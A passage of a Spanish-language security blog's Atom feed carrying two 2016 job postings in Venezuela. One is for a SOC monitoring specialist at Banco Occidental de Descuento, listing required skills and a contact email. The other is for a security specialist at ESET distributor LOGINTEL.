&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;En el&amp;nbsp;&lt;a data-saferedirecturl=&quot;https://www.google.com/url?hl=es&amp;amp;q=http://www.bod.com.ve/&amp;amp;source=gmail&amp;amp;ust=1481205542847000&amp;amp;usg=AFQjCNG4zq6nD914tIif6UsKafFSZTdR3Q&quot; href=&quot;http://www.bod.com.ve/&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;Banco Occidental de Descuento&lt;/a&gt;&amp;nbsp;(BOD) se requiere de un especialista en seguridad de la información para desempeñarse en el área de monitoreo de seguridad y gestión de incidentes (&lt;a data-saferedirecturl=&quot;https://www.google.com/url?hl=es&amp;amp;q=https://en.wikipedia.org/wiki/Information_security_operations_center&amp;amp;source=gmail&amp;amp;ust=1481205542847000&amp;amp;usg=AFQjCNFLbqHQNl5XG9STblmLGPUeo4mxXA&quot; href=&quot;https://en.wikipedia.org/wiki/Information_security_operations_center&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;SOC&lt;/a&gt;).&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Entre las habilidades requeridas al cargo se destacan:&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Disponibilidad inmediata&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Ingeniero, TSU o&amp;nbsp; Licenciado en Computación o carreras afines&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Graduado o en primeros años de experiencia laboral.&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Interés de aprendizaje en el área de seguridad informática&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; TSU informática / computación, sistemas o&amp;nbsp;afín.&amp;nbsp;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Conocimientos o hab. básicas: Herramientas de Monitoreo y gestión de eventos (SIEM, Tívoli, Remedy).&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Conocimientos y habilidades de programación en Java; .net; C++&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt; outline: 0px;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Conocimientos en Sistemas de Servidores Windows,&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt; outline: 0px;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Conocimientos Básicos de Servidores&amp;nbsp; Unix,&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt; outline: 0px;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Conocimientos Básicos de Servidores Linux,&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt; outline: 0px;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Conocimientos Básicos de Servidores Z/OS&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt; outline: 0px;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Conocimientos Básicos de Mainframes IBM&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Deseable dominio de idioma inglés (no limitativo)&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;·&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Deseable dominio de redes (no limitativo)&amp;nbsp;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;· &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Deseable 1 año de experiencia en áreas de monitoreo (transaccional, seguridad, tecnológico) &amp;nbsp;(no limitativo)&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Aptitudes analíticas:&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Solución de problemas&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Pensamiento analítico&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Metódico&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Cualidades personales:&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Responsabilidad&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Sociabilidad&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Integridad y honestidad&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;m_-3586646457937329784m5555020646934788407msolistparagraph&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;-&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Proactivo&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;m_-3586646457937329784MsoNormalTable&quot; style=&quot;background-color: white; border-collapse: collapse; color: #222222; font-family: arial, sans-serif;&quot;&gt;&lt;tbody&gt;
&lt;tr style=&quot;height: 18.55pt;&quot;&gt;&lt;td colspan=&quot;2&quot; style=&quot;height: 18.55pt; margin: 0px; padding: 0cm 5.4pt; width: 288.7pt;&quot; valign=&quot;top&quot; width=&quot;385&quot;&gt;&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr style=&quot;height: 1.35pt;&quot;&gt;&lt;td colspan=&quot;2&quot; style=&quot;height: 1.35pt; margin: 0px; padding: 0cm 5.4pt; width: 288.7pt;&quot; valign=&quot;top&quot; width=&quot;385&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Interesados escribir a&amp;nbsp;&lt;a href=&quot;mailto:atavara@bod.com.ve&quot; style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;atavara@bod.com.ve&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/5175553863447282140/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2016/12/vacante-en-banco-occidental-de.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/5175553863447282140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/5175553863447282140'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2016/12/vacante-en-banco-occidental-de.html' title='Vacante en Banco Occidental de Descuento (BOD)'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5LhsBdXQvfAl596A8gZ-N133t7LJMV9AcVwOd8s4cWD5ES9AcYqSYaosUYAdQnUJsBbpPndc5UrtqtDz2n7Y91wOgWCKtNmWKnORyZ_2M6AsZ1MHe9ybj6gZHxpIyqbqsPxILYZmq-s/s72-c/empleos.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-6359265875660738888</id><published>2016-11-29T15:51:00.001-04:00</published><updated>2016-11-29T15:51:37.276-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Empleo"/><title type='text'>Búsqueda en Venezuela de talentos en Seguridad de la Información</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7RJBQCdLv3_GFcuaI2Q3Wwb1VP0dwHPIXrNl8pR4hCaPOwJWCBMlqgEHn-N44kCMmiKr17WW_qeZz1U0jwto2YXj0Uf1asYgaT3SxDhLeNyXHqM5hQ5FAluBmgTlHZrcf68niBtTA2nA/s1600/ofertas-de-empleo.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;314&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7RJBQCdLv3_GFcuaI2Q3Wwb1VP0dwHPIXrNl8pR4hCaPOwJWCBMlqgEHn-N44kCMmiKr17WW_qeZz1U0jwto2YXj0Uf1asYgaT3SxDhLeNyXHqM5hQ5FAluBmgTlHZrcf68niBtTA2nA/s640/ofertas-de-empleo.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: black; font-family: Arial, sans-serif;&quot;&gt;&lt;a data-saferedirecturl=&quot;https://www.google.com/url?hl=es&amp;amp;q=http://www.logintel.com.ve/&amp;amp;source=gmail&amp;amp;ust=1480534488035000&amp;amp;usg=AFQjCNGqxncrcELul8HE1ty5QEH_lnsQnw&quot; href=&quot;http://www.logintel.com.ve/&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;LOGINTEL C.A.&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; font-family: Arial, sans-serif;&quot;&gt;, empresa enfocada al área de soluciones de seguridad informática, con representación exclusiva para Venezuela de las marcas ESET, se encuentra en la búsqueda de personal para desarrollarse como Especialista de Seguridad Informática.&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span lang=&quot;ES&quot; style=&quot;color: black; font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: black; font-family: Arial, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; font-family: Arial, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Entre las habilidades a desarrollar en el cargo de encuentran: Instalaci&lt;span style=&quot;color: black;&quot;&gt;ó&lt;/span&gt;n y configuración de soluciones de seguridad que contemplan protecciones antivirus, firewall, control y gestión de redes, políticas de seguridad, cifrado de datos, filtrado de correos, gestión de políticas de seguridad, gestión de dispositivos móviles (BYOD) y comunicaciones corporativas.&amp;nbsp;&lt;span style=&quot;color: black;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; font-family: Arial, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Disponemos de un programa de entrenamiento certificación para las habilidades requeridas&lt;span style=&quot;color: black;&quot;&gt;. N&lt;/span&gt;o se exigen conocimientos previos.&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; font-family: Arial, sans-serif;&quot;&gt;Requisitos:&lt;/span&gt;&lt;span lang=&quot;ES&quot; style=&quot;font-family: Arial, sans-serif;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: &amp;quot;Times New Roman&amp;quot;, serif; margin-left: 0cm; margin-right: 0cm; text-align: justify;&quot;&gt;
